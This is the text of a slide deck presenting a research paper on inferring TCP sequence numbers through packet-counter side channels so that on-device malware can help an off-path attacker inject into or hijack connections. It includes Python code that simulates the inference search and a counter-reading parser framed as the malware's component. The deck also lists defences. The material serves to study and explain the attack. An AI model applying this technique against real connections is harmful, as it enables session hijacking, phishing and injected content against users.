
1 University of Michigan
Collaborative TCP Sequence Number Inference Attack — How to Crack Sequence Number Under A Second. Zhiyun Qian and Z. Morley Mao, University of Michigan; Yinglian Xie, Microsoft Research, Silicon Valley.

2 Brief History TCP was not designed with security in mind, so numerous patches have been added to it over the years to keep it secure. One such patch is the randomization of the TCP Initial Sequence Number (ISN), introduced in RFC 1948 and later revised in RFC 6528 (2012). The patch was proposed to defeat off-path spoofing attacks that attempt to inject packets with forged source addresses. ISN randomization prevents easy prediction of the ISN and has rendered most sequence number guessing attacks very hard to carry out.

3 ISN = M + F(localhost, localport, remotehost, remoteport)
Brief History Cont. A function is defined that derives a per-connection offset and adds it to a counter M driven by a 4-microsecond timer, so that the ISN of one connection cannot be predicted from the ISN of another. The initial sequence number is generated as ISN = M + F(localhost, localport, remotehost, remoteport, secret), where F is a cryptographic hash (RFC 1948 suggests MD5) and secret is a per-host random value that is never disclosed. The secret, omitted from the short form of the formula above, is essential: without it anyone who knows the four-tuple could compute F and the randomization would add nothing beyond the timer.
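The formula above, carried through in code as an added example (not code from the paper, the slides, or any operating system): M is a 4-microsecond counter, F is an MD5 hash of the four-tuple plus a per-host secret truncated to 32 bits, and the two are added mod 2^32. The secret, its size and the `now_ns` parameter (which lets the clock be pinned for a deterministic check) are assumptions of this example.

```python
import hashlib
import os
import socket
import struct
import time

# Added example, not code from the paper or the slides: an ISN generator in the
# RFC 1948 / RFC 6528 style. M is a counter driven by a 4-microsecond clock; F is a
# hash of the connection four-tuple plus a per-host secret, truncated to 32 bits.
# The secret (assumed here to be drawn at boot and never exposed) is what stops an
# off-path attacker from simply recomputing F for the connection he targets.

MOD32 = 1 << 32
ISN_SECRET = os.urandom(16)   # assumption: 128-bit secret generated once per boot


def isn_clock_4us(now_ns=None):
    """M: the 4-microsecond timer, reduced mod 2^32."""
    if now_ns is None:
        now_ns = time.monotonic_ns()
    return (now_ns // 4000) % MOD32


def isn_hash(local_ip, local_port, remote_ip, remote_port, secret=ISN_SECRET):
    """F(localhost, localport, remotehost, remoteport, secret), truncated to 32 bits.
    MD5 is the function RFC 1948 suggests; RFC 6528 asks only for a PRF. The output
    need not be collision resistant, only unpredictable to whoever lacks the secret."""
    msg = (socket.inet_aton(local_ip) + struct.pack("!H", local_port)
           + socket.inet_aton(remote_ip) + struct.pack("!H", remote_port)
           + secret)
    return struct.unpack("!I", hashlib.md5(msg).digest()[:4])[0]


def initial_sequence_number(local_ip, local_port, remote_ip, remote_port,
                            now_ns=None, secret=ISN_SECRET):
    """ISN = M + F(...) mod 2^32. Same tuple, later time: ISN advances with M only."""
    m = isn_clock_4us(now_ns)
    f = isn_hash(local_ip, local_port, remote_ip, remote_port, secret)
    return (m + f) % MOD32
```

Two properties follow directly from the construction and are worth checking: for a fixed four-tuple the ISN advances by exactly one per 4 microseconds (the hash term is constant), and changing either a port or the secret changes the ISN unpredictably. The first property is why RFC 1948 still needs the secret: an attacker who can observe one connection's ISN and knows F would otherwise predict the next.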

4 CONTENTS
Introduction
TCP Sequence Number Inference Attack
Design and Implementation of TCP Attacks
Attack Impact Analysis
Conclusion

5 INTRODUCTION In 2007, an article in Phrack Magazine revisited the problem and showed that the TCP sequence number can still be inferred from how a host treats in-window and out-of-window incoming packets. In 2012, researchers found that the sequence number inference attack is more generally applicable, impacting even short-lived HTTP connections. That attack, however, relies heavily on the presence of sequence-number-checking firewall middleboxes deployed in the network.

6 INTRODUCTION This paper generalizes these attacks by eliminating the strong requirements they impose, enabling a broader class of attacks. The paper makes the following key contributions: a threat model in which unprivileged on-device malware collaborates with an off-path attacker; the identification of sequence-number-dependent packet counters as the side channel; and an efficient way to complete the sequence number inference.

7 TCP SEQUENCE NUMBER INFERENCE ATTACK
Threat Model
Packet Counter Side Channels
TCP Incoming Packet Validation
Sequence-Number-Dependent Counter in Linux
Sequence-Number-Dependent Counter in BSD/Mac
Sequence-Number-Dependent Counter in Windows
Inference Performance and Overhead
Noisiness of Sequence-Number-Dependent Counters

8 THREAT MODEL There are four main entities in this threat model:
1. The victim smartphone and a target application, constituting the attack target.
2. The legitimate server, which talks to the victim smartphone using an unencrypted application-layer protocol (e.g., HTTP).
3. The on-device malware, which is unprivileged and cannot tamper with other apps directly.
4. The off-path attacker, who is capable of spoofing the IP address of the legitimate server.

9 Threat Model Flow Figure 1 shows the basic flow of the threat model. The attacker sends probing packets to the target; the malware residing on the target observes, through the packet counters, whether the attacker's guessed sequence number was correct and replies with that feedback.

10 Threat Model At a high level, the off-path attacker needs two pieces of information: the four-tuple of a target connection, i.e., source/destination IP addresses and source/destination port numbers, and the correct sequence number. The on-device malware can easily identify the currently active connection, but it does not know the sequence number in use.

11 Packet counter side channels
We look at a particular type of side channel, packet counters, which can provide indirect feedback on whether a guessed sequence number is correct. Several sources expose such counters: "netstat -s" prints a set of them on all major OSes, including Microsoft Windows, Linux, BSD, Mac OS and smartphone OSes such as Android and iOS. The IPID side channel can be considered a special form of packet counter that records the total number of outgoing packets, since on hosts with a global IPID it is incremented for every outgoing packet.
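What the on-device malware actually reads, as an added example that is not code from the paper: on Linux and Android the counters behind "netstat -s" come from the world-readable file /proc/net/netstat, which pairs a "TcpExt:" header line naming the counters with a "TcpExt:" line holding their values (and likewise for "IpExt:"). The two snapshots below are constructed for this example, not captured from a device, and the counter names shown are a subset of the real ones.

```python
# Added example, not the paper's code: parsing /proc/net/netstat and reporting the
# change of one counter between two snapshots, which is the feedback one probing
# round needs. Sample snapshots are constructed; only a few counters are listed.

SNAPSHOT_BEFORE = """\
TcpExt: SyncookiesSent SyncookiesRecv DelayedACKs DelayedACKLocked DelayedACKLost TCPPureAcks
TcpExt: 0 0 4127 3 96 23456
IpExt: InNoRoutes InTruncatedPkts OutMcastPkts
IpExt: 0 0 12
"""

SNAPSHOT_AFTER = """\
TcpExt: SyncookiesSent SyncookiesRecv DelayedACKs DelayedACKLocked DelayedACKLost TCPPureAcks
TcpExt: 0 0 4129 3 97 23470
IpExt: InNoRoutes InTruncatedPkts OutMcastPkts
IpExt: 0 0 12
"""


def parse_proc_net_netstat(text):
    """Return {"TcpExt": {"DelayedACKLost": 96, ...}, "IpExt": {...}}.

    Each section arrives as two lines with the same prefix: first the names,
    then the values. Length mismatches are treated as errors rather than
    silently misaligning counters."""
    pending = {}      # section -> header names still waiting for their values
    counters = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        section, sep, rest = line.partition(":")
        if not sep:
            raise ValueError("malformed line: %r" % line)
        fields = rest.split()
        if section not in pending:
            pending[section] = fields           # header line
            continue
        names = pending.pop(section)            # value line
        if len(fields) != len(names):
            raise ValueError("%s: %d names but %d values" % (section, len(names), len(fields)))
        counters[section] = dict(zip(names, (int(v) for v in fields)))
    if pending:
        raise ValueError("header without values: %s" % ", ".join(pending))
    return counters


def counter_delta(before_text, after_text, section="TcpExt", name="DelayedACKLost"):
    """Feedback for one probing round: how far the counter moved between snapshots."""
    before = parse_proc_net_netstat(before_text)[section][name]
    after = parse_proc_net_netstat(after_text)[section][name]
    return after - before


def read_netstat(path="/proc/net/netstat"):
    """Take a live snapshot; needs no privilege beyond reading /proc."""
    with open(path) as fh:
        return fh.read()
```

The malware's loop is then: snapshot, signal the off-path attacker to send a round of probes, snapshot again, and report `counter_delta(...)`. Nothing here requires root or access to the victim app, which is the point the threat model makes.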

12 TCP incoming packet validation
There are five main checks performed by the Linux TCP stack, identified from the corresponding source code as well as the controlled experiments in the paper. These checks are performed, in this order, for any incoming TCP packet that is deemed to belong to an established connection based on the four-tuple:
Error check
Sequence number check
Acknowledgment number check
Zero-payload check (whether the packet carries data)
Retransmission check

13 TCP Incoming Packet Validation
The error check drops invalid packets early on. The sequence number check tests whether the packet is in window. The acknowledgment number check requires the ACK number to lie within [Y, Y+outstanding_bytes]. The zero-payload check determines whether the packet carries any payload. The retransmission check tests whether the packet's ending sequence number is smaller than or equal to the next expected sequence number. Here Y is the first unacknowledged sequence number and outstanding_bytes is the total number of bytes sent but not yet acknowledged.

14 Sequence Number Dependent Counter in Linux
Here we find the sequence-number-dependent counter. The "if" condition in the Linux receive path says: if the packet's starting sequence number is not equal to its ending sequence number (i.e., the packet carries a nonzero payload), and its starting sequence number is "before" the expected sequence number, then the packet counter DelayedACKLost is incremented. "Before" is the kernel's signed 32-bit comparison of sequence numbers, so the condition holds for any guess in the half of the circular sequence space that precedes the expected value, which is what makes the counter usable as a search oracle.

15 SERVER-SIDE SEQUENCE NUMBER INFERENCE
Sequence number inference illustration using the DelayedACKLost packet counter (four-way search). Sequence number inference illustration using the DelayedACKLost packet counter (binary search).
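The validation order of slides 12 and 13, the DelayedACKLost condition of slide 14 and the binary and four-way searches of slide 15 are tied together in the following added example; it is a simulation written for this page, not the paper's code. The receiver model reproduces the 2012-era Linux behaviour the paper analyzed (the sequence number check runs before the ACK check, so an out-of-window data segment whose sequence number is "before" rcv_nxt bumps the counter regardless of its ACK field; newer kernels with RFC 5961 challenge ACKs differ), and the window size, the one-byte probe, the ACK guesses and the sample sequence numbers are constructed assumptions.

```python
# Added example, not the paper's code: a receiver modelling the Linux checks of
# slides 12-14, an oracle that returns the DelayedACKLost delta of one probing
# round, and the N-way search of slide 15 (ways=2 is the binary search,
# ways=4 the four-way search). All values are constructed for the example.
MOD = 1 << 32
HALF = 1 << 31


def before(a, b):
    """Linux before(): true when a precedes b in 32-bit circular sequence space."""
    return ((a - b) % MOD) >= HALF


def after(a, b):
    return before(b, a)


class LinuxLikeReceiver:
    """Established socket as seen by the receive path the paper examined."""

    def __init__(self, rcv_nxt, snd_una, snd_nxt, rcv_wnd=65535):
        self.rcv_nxt, self.snd_una, self.snd_nxt = rcv_nxt % MOD, snd_una % MOD, snd_nxt % MOD
        self.rcv_wnd = rcv_wnd
        self.delayed_ack_lost = 0   # the TcpExt counter the malware watches
        self.injected = 0           # probe bytes that actually entered the receive queue

    def receive(self, seq, ack, payload_len):
        seq %= MOD
        end_seq = (seq + payload_len) % MOD
        # Check 2 (sequence number): out-of-window segments go to tcp_send_dupack,
        # which bumps DelayedACKLost only for data whose seq is before rcv_nxt.
        # The ACK field is never examined on this path.
        if before(end_seq, self.rcv_nxt) or after(seq, (self.rcv_nxt + self.rcv_wnd) % MOD):
            if payload_len and before(seq, self.rcv_nxt):
                self.delayed_ack_lost += 1
            return "out-of-window"
        # Check 3 (ACK number): must lie within [snd_una, snd_nxt].
        if before(ack, self.snd_una) or after(ack, self.snd_nxt):
            return "bad-ack"
        # Check 4 (zero payload): nothing to queue.
        if payload_len == 0:
            return "pure-ack"
        # Check 5 (retransmission): old data forces an immediate ACK, counter++.
        if not after(end_seq, self.rcv_nxt):
            self.delayed_ack_lost += 1
            return "retransmit"
        if not after(seq, self.rcv_nxt):
            # in-order (or head-overlapping) data is delivered; this is the injection
            self.injected += (end_seq - self.rcv_nxt) % MOD
            self.rcv_nxt = end_seq
            return "accepted"
        return "out-of-order"   # queued ahead of rcv_nxt, counter untouched


class ProbeChannel:
    """Off-path attacker plus on-device malware: spoofed probes in, counter delta out."""

    def __init__(self, rx, ack_guess, payload_len=1):
        self.rx, self.ack, self.payload_len = rx, ack_guess % MOD, payload_len
        self.rounds = self.packets = 0

    def probe_round(self, guesses):
        start = self.rx.delayed_ack_lost
        for g in guesses:
            self.rx.receive(g, self.ack, self.payload_len)
        self.rounds += 1
        self.packets += len(guesses)
        return self.rx.delayed_ack_lost - start   # number of guesses "before" rcv_nxt


def infer_rcv_nxt(probe_round, ways=2):
    """N-way search: each round sends ways-1 probes and reads the counter once."""
    # Round 1: one probe at 0 tells which half of the circle holds rcv_nxt.
    if probe_round([0]) > 0:
        lo, hi = 1, HALF
    else:
        lo, hi = HALF + 1, MOD        # MOD stands for 0 after wrap-around
    while lo < hi:
        size = hi - lo + 1
        probes = sorted({max(lo, min(hi - 1, lo + (j * size) // ways - 1))
                         for j in range(1, ways)})
        c = probe_round(probes)       # the counter delta counts probes below rcv_nxt
        if c > 0:
            lo = probes[c - 1] + 1
        if c < len(probes):
            hi = probes[c]
    return lo % MOD
```

Two things the simulation makes visible. First, the tradeoff of slide 18: the binary search needs 32 rounds of one packet, the four-way search 17 rounds but more packets in total. Second, a caveat on precision: with an acceptable ACK guess the search lands exactly on rcv_nxt, and the probe that hits it is accepted as one injected byte; with an unacceptable ACK the in-window probe at rcv_nxt-1 is discarded before the retransmission check, so the result is one less than rcv_nxt and nothing is injected.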

16 Sequence Number Dependent Counter in BSD/Mac OS
The paper also reports sequence-number-dependent counters in BSD/Mac OS. They are:
rcvduppack and rcvdupbyte
rcvpackafterwin and rcvbyteafterwin
rcvoopack and rcvoobyte
rcvdupack and rcvacktoomuch
The first three pairs can be used to infer server-side sequence numbers. The last pair is used to determine client-side sequence numbers.

17 Sequence Number Dependent Counter in Windows
Microsoft Windows OSes do not expose such sequence-number-dependent counters and are therefore not vulnerable to this attack. On Windows 7, for example, the TCP-related packet counters in the output of "netstat -s" are the total numbers of incoming packets, outgoing packets and retransmitted packets. These counters do not depend on the sequence number of an incoming packet and so do not leak it.

18 Inference Performance and Overhead
The sequence number inference is implemented on Android and Mac OS. Figure 7 shows the general tradeoff: the fewer rounds an attacker wants, the more bytes he needs to send in total, since an N-way search needs fewer rounds than a binary search but sends more probes per round. Figure 8 shows that the inference time increases with the RTT between attacker and client, because every round costs at least one round trip.

19 Noisiness of sequence number dependent counters
The authors claim that these sequence-number-dependent counters are clean side channels that rarely increment naturally, even with background traffic. To support this claim quantitatively, a worst-case experiment is carried out: a YouTube video is played in the background while web pages are browsed at the same time, and the counters are watched to see how often they increment. The experiment indicates that the probability of the counter incrementing due to noise during one round of probing is roughly 0.059%.

20 DESIGN AND IMPLEMENTATION OF TCP ATTACKS
Attack Requirements
Client-Side TCP Injection
Passive TCP Hijacking
Server-Side TCP Injection
Active TCP Hijacking

21 ATTACK REQUIREMENTS
Malware on the client with Internet access
Malware that can run in the background and read packet counters
Malware that can read the list of active TCP connections and their four-tuples
A predictable external port number if NAT is deployed

22 CLIENT-SIDE TCP INJECTION
In this attack, an attacker attempts to inject malicious data into a connection established by another app on the phone. The essential part of the attack is the TCP sequence number inference, which has already been described in detail. The challenge is that the injected data may compete with the data sent by the legitimate server. For instance, if the connection under attack is an HTTP session, a valid HTTP response typically follows immediately after the request is sent, so by the time the sequence number inference is done, at least part of the HTTP response has already been sent by the server. The injected HTTP packets can then likely only corrupt the response and cause a denial of service instead of doing serious damage.

23 CLIENT-SIDE TCP INJECTION
The idea is to leverage two common scenarios:
1. The server may take a long time to process a request and assemble the response. This is especially common, as many services (websites) take 100ms or more to process a request. The fact that the sequence number inference time can in certain scenarios (when the RTT from the server to the client is small) be brought below 100ms makes the injection attack as powerful as hijacking.
2. A single TCP connection is reused for more than one pair of HTTP request and response. The idea is to use the inferred sequence number to inject malicious data not into the first HTTP response but into a later one.
In both cases, the attacker has enough time to conduct the sequence number inference.

24 PASSIVE TCP HIJACKING

25 ACTIVE TCP HIJACKING

26 Attack impact analysis from case studies
Facebook Javascript Injection
Phishing Facebook Login Page
Command Injection on Windows Live Messenger
Restricted Facebook Login Page Hijack

27 Success rates and analysis of the attacks
The success rate of Facebook Javascript injection, even with RTT = 100ms, is 87.5%. The success rate of phishing the Facebook login page is below 50%; when two nodes with latencies of 70ms and 100ms are used, the rate increases to 62.5% and 82.5% respectively. Command injection on Windows Live Messenger was carried out using server-side TCP injection: adding a friend, removing an existing friend, changing status messages and sending messages to friends were all performed, with an inference time of around 2-3 seconds. The restricted Facebook login page hijack depends on the user being convinced that the app indeed has a relationship with the target website, so that the user enters his password into the browser.

28 Conclusion The paper offers a few defense strategies against the attack:
Always use SSL/TLS.
Remove unnecessary global state, or allow only privileged programs to access such state.
Provide better isolation among resources.

29 QUESTIONS ?

